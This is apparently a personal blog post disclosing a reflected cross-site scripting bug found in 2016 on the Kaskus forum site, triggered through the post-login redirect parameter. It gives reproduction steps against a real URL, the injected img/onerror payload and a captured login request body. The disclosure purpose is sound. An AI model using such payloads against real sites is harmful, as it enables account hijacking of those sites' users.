This is old bug i found on 2016, i write this on my new blog to sharing what i found, because i think its bug is very interesting and unique.
Description
This bug is unique, because XSS exposed when redirect to previous page after login.
Step To Reproduce
- Go to http://www.kaskus.co.id/thread/57a47e691cbfaa092b8b456a/?ref=header&med=header
- Change parameter to “><img+src%3Dx+onerror%3Dprompt(‘XSS/By/LocalHost’)%3B>
- Login with widget on top and you will redirect
- And XSS will be exposed
Http Header response :
username=sebutsajanos&password=&md5password=&md5pass word_utf=&securitytoken=1470955602- c2079dd69c8f65d455e977727407176b&url=%252Fthread%252F57a47e691cbfaa092b8b456a%252F%25 3Fref%253Dheader%2526med%253D%252522%25253E%25253Cimg%252Bsrc%25253Dx%252Bonerror %25253Dprompt%2528%252527XSS%252FBy%252FLocalHost%252527%2529%25253B%25253E
Video :
Note :
Kaskus Response is very quick and i got SWAG from them.